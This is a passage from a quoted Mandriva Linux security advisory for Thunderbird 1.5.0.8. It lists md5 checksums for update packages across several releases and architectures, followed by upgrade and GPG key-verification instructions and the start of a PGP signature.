>2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  70882501b0fc01a56cee67c2b7c63ac5  
>2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Mandriva Linux 2007.0/X86_64:
>  47aa8c7af46ee44f1b51e0f44772beeb  
>2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e284b46733e04ab96cccb612de04e5a8  
>2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e73efd093c48aa82d6f73025f1ade443  
>2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ed790bdd1a45343b427925765f5f2b5c  
>2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  61690a97ef04b6083693ffe4a9ab3176  
>2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  889574eda89385739aad6eda7f3d2604  
>2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ef9b59cdd619da74737b5e91e4067386  
>2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e20a88ece32f8ee81aaedd828558d880  
>2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  250f6f86984922da278774d480ba37a7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f683dba38c9055cbac36f8468e357ebf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6594d0bb3f7770f168728827c1cf9f83  
>2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1ee011c3c94c7b081f53b9a55996da0c  
>2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be24dd32e628b8294c1b87d200cf02dd  
>2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  020acf8e510080a701c6278c6eb862ae  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  af4c92e4f3eaf833111572ead14c8c04  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7483c3a55198fcbc9be2c9750919a370  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  753acdb58e6400659dab48ff78f371e7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  fb83f542bd12edda5e85d9873a08a938  
>2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  996bbfb13654cfc2180036ea6b1e61df  
>2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ff6217b99ab96a1444b6a758bf184ecf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f15d9f053011068deba71fdc05dc6d46  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  98f63b0dedef781ec16f8bebb6a032cb  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e5e42bb849d26a4f59fb6204d6ed9850  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8bc9d56d4778baf40b115eb805a506b3  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  21c7d7ffd14a724e4ce9d96e99d0f3c7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9b115831c8ae36d7141c93a9d867d445  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  d6efb3cdaba13c17dd31147011796614  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4239765036a0bffaa4fcff9fb076a221  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be87cc456600cb0dc18730ae3f75af92  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  459367e42865a1de4374d2a9b8c36232  
>2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e1b30720806b2c6ab650251f9756127  
>2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  70c5525bea63d291374706abfb4523c4  
>2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4addf81f6fdb0fe55d2274ba726d066e  
>2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9c9a1e6a7623a712f40666e77fd3f2b4  
>2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9cd9d0509bbe4d0bc7c092118253c237  
>2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  b23236fc11caa38b1354893f1e9863e1  
>2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c5b898d7f04c26a34bb4223ee4547586  
>2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8e114fec014131d472790035a1509783  
>2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  3eda3b36a83c550a1f52faf6adfb0b10  
>2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c336cc525567465d1649ee55c604d3a3  
>2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  476f974ea2e3b9ef971231b8b08e62f0  
>2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7878332de8134b9025b924315d6ffbf6  
>2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7602f9099c26d60e934f54918dd38e46  
>2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  52ba4b91175db4376fd4c4e9018969c3  
>2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e2bc31ee83c5c47f06953aba976a27d  
>2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  47b180beb65802e89f7e6a8be7f33d15  
>2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6485a71b5d07fef3e337630aa53bb4c6  
>2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6b5df9cad533fc75fc47191df5f3dabf  
>2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99b61d660a72eff639f78ec0422aeaf2  
>2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99cfe247978fe85b5b5186bf12247f3a  
>2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8c393629997cea717c2f1e8d077a9344  
>2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be518e4b4833e6cb9d083871101be35b  
>2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8dedff0ffd0e7b7721b256f01821f188  
>2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  05202d61506a60981fb9a317ce6a5d5d  
>2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0deda88ec857fb0c11b57555814a20ec  
>2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0f2f7928b2edfbe0ae5faf127b0ed066  
>2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Corporate 3.0:
>  71192ef0a8bd28533718191d287d8158  
>corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
>  c0121a4a0192d7944b1f8d30c977ab38  
>corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
>  53c403f48cb8547f0eb646ab1b41b656  
>corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  032ebcc12942292620b05929e0583f3a  
>corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  c88d6e26aa75dab433abcf71f2962e5c  
>corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
>  dcc54cb45829470f4267806696b46eca  
>corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  e7ba899422d7cbfd343659b810e4ee52  
>corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
>  d987b44bd201c2a23b404751e13df538  
>corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  9d496fa524a5226676f56ed87d2015ec  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
>  eac64993c47963ede70eca5fb62e30b9  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  b5523fcbf2370d1805e1f917faaa31c8  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  1eb806fe5a429b52f010e16aeed4cb4a  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8da00f3e4033ec813df4548072ac9f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a2434c868a3b5799cb69c31d43f900c  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  a1bb48121d53f83bf0efd303ea477b71  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  6f9d308c194ae42cfa0787afdebff2cc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  bb3c3cf4056814131f8031471c81ac6f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  4228aaf098c501a80af97469393482b5  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a95ad54416e2f002d1aaa32557cf947  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  19e1eac0351d89760ee31b4c9ee4fcc4  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1c21de0415bd0223237aa82795cc9600  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  a11487e4145c294a57a77491f6996748  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  31064002ac59d4857c3c45c3161580dc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  fc88eeba422b084ffa67b77211248ef0  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
>  4ead83e3405e7469370b4f02a9254ddc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a15b707a6d7f8e9b25c1ccaea023333  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8c565fd3b42069b2e42103d98dfab2  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  0040d479d7e55304c06df39b2233d12e  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  6fab1321b377748e22a6709b772d5159  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  1969ec5d6cc27df2f09f9733b5b37c6d  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  0c34a8e8bd3f9011283fe990771a857a  
>corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  68781ca20e2232457046bdab86b59462  
>corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  37c3909b8feb9a35208519ccf4ec8a46  
>corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea2febd0e93d9348fd580452f7adc0be  
>corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  2eac2aaeb4fe209f98aa85505f6a9b87  
>corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  d8d8fc30075f0848859cbe96b26404a7  
>corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
>  3af19a8b01fb316451132e6460c7deb0  
>corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7aed893e50dff94f47d658d70093824  
>corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
>  ab6ead860edf6de4935aa3bb4ecf4721  
>corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  a9b0bc2b2bcf186b5a284cba3d6cad19  
>corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  373554b2032c20a61c48f4a4e11e5b57  
>corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a2efc51627d9f55929e1b33e20f5274  
>corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
>  27ab1d70b317c477b56df8223a8477b4  
>corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
>  0bcd50b34bec84016747f4919b43b8e1  
>corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
>  4b26e1653ccf78604c16b25ed7357dfb  
>corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea1a0d0349f9a2f26b23c7678d7e5736  
>corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  7d7c13e7a820c069b3c657adf57443d9  
>corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  ef0755e523de702c802890f494ee5ea0  
>corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7618d53bff6c0764297f2352c5d0239  
>corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  8df8db645153b5f7539044d5f892ad54  
>corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  d26cb2fbb5301bcf127ea4e4606f52b9  
>corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  f57d3dd11471a798542b87f0a3c68e82  
>corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f3aede5440aeb78b59350fe56bb221d2  
>corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  bda7588d80565c17190fb407bdc3b1b2  
>corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
>  5f0764d5685d0836bd718fdc86b8a73a  
>corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  2a1892c7e027dba761df43c98bb5e85f  
>corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>
>  Corporate 3.0/X86_64:
>  c109965ada094232d0958a8121be977a  
>corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e50d4054e85e4624b285067c75cfab18  
>corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f8cc5e4a36961ef4db2b8632fc6734d9  
>corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  70e0a1878ce810ee835e7eca08a11e12  
>corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  50abb11664ca02e6d77cbf30396e5398  
>corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5565876286c51872fb0ff90df059f052  
>corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cdd3892a5ba2a7c1ffe29d009e9d23a9  
>corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ba3e7a92e79e00cd74b722ab94d832eb  
>corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c11927081645df376c72f27e8ebc6a85  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  448172b7c753b48c81b2a2c5d337b9e5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b83c0eb2158672f087fd5754ca27efad  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  49b91f3eae7a0773ecce62f635a6dfe9  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3a0cf5325721e29c4eba9ee7cbc7efb7  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cadf1aff1e915adb9e14539eb04521db  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8218118b837bf05b3603652f0d4c5690  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7c7190fc9ec1fc5774436ec7b0c92fd5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a42f63c64470ba933d6239bdf8b1569c  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  af8c5d7e3569278f3e9d364362be25b3  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c749a5b7ac03ad98919f83425fcbd4c2  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ac82cd1f4fc0c5ed57be5b165cc65be4  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0fbd67977bdfc1b1f9aa3c846c80c244  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4d26f0c7b32d3888e1e5c4c14516a4df  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  37fbc8358f1f11d5cb9f0e9b2fab3b26  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6bec775a601e84be547246ae5638d059  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0dc1c40ef6d1a233661048447db25543  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7ec948cc8df84aae6b3d660bd4187208  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4b7ba48ffeff51709b26c8f315a4aaa1  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  94fceae9b7bc6d48fe2677eecaaf11a6  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d578499c38c981f2b8cc55fc1351efef  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  095291274be4a418d05c4e96cb441d90  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  272b554e86966e103d3e7f42b5cba9db  
>corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  52bd52c4d5eaad6fa541dd20db5411d0  
>corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  2536b28aa209a912ff74601db4e685b4  
>corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  484ad35799b9a8cd277754bf1b13d686  
>corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  42ff5a3a8320c4be3ffb1f1d74912f78  
>corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8a46a1d9f9380c205699ce090d749ff2  
>corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3c30c5aeee783bfabe34fb1ff7357d38  
>corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a90b14f77d6eed2228bfa55457803f6f  
>corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  719239492f7d93b04f2c95902fccf94c  
>corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f52bcdf19f10745e756f0d58616126df  
>corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  79826e403152cbe90ddf3bd4d8d64abe  
>corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  18c08993c8f43c976be6cf2e8cfb2c35  
>corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b17866029fe4244a77af59fbb55a07b9  
>corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  878f59fdb3ebb5929fc23437a17fb5ad  
>corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d62fb25dc173e8b12be8623ae8fbf9bf  
>corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  266322718c7cedd78e89524940f15d55  
>corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  32c5fcab859aff66aaf704b997a1c625  
>corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  17d7eeb0fbd25df1f76d5fa875ef7a3d  
>corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4aabd47a35cb15547ccbe4eda1b521e8  
>corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  1d8d27be2902605b0eae9dcbd89654cc  
>corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6c116048a69b3c176831fde5ff0a252a  
>corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e5bcb8518c5a61e63e62f90c363c67ae  
>corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5569afdd940d28bdf37a1003d5d5d6b0  
>corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d00245da432be7a7d268846891555930  
>corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ee130a70f9b1fe5719fea63963f3db6d  
>corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  81f41bebeb9eca34d7c27ab81ca41af6  
>corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  _______________________________________________________________________
>
>  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
>  of md5 checksums and GPG signatures is performed automatically for you.
>
>  All packages are signed by Mandriva for security.  You can obtain the
>  GPG public key of the Mandriva Security Team by executing:
>
>   gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
>  You can view other update advisories for Mandriva Linux at:
>
>   http://www.mandriva.com/security/advisories
>
>  If you want to report vulnerabilities, please contact
>
>   security_(at)_mandriva.com
>  _______________________________________________________________________
>
>  Type Bits/KeyID     Date       User ID
>  pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>   
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2.2 (GNU/Linux)
>
>iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
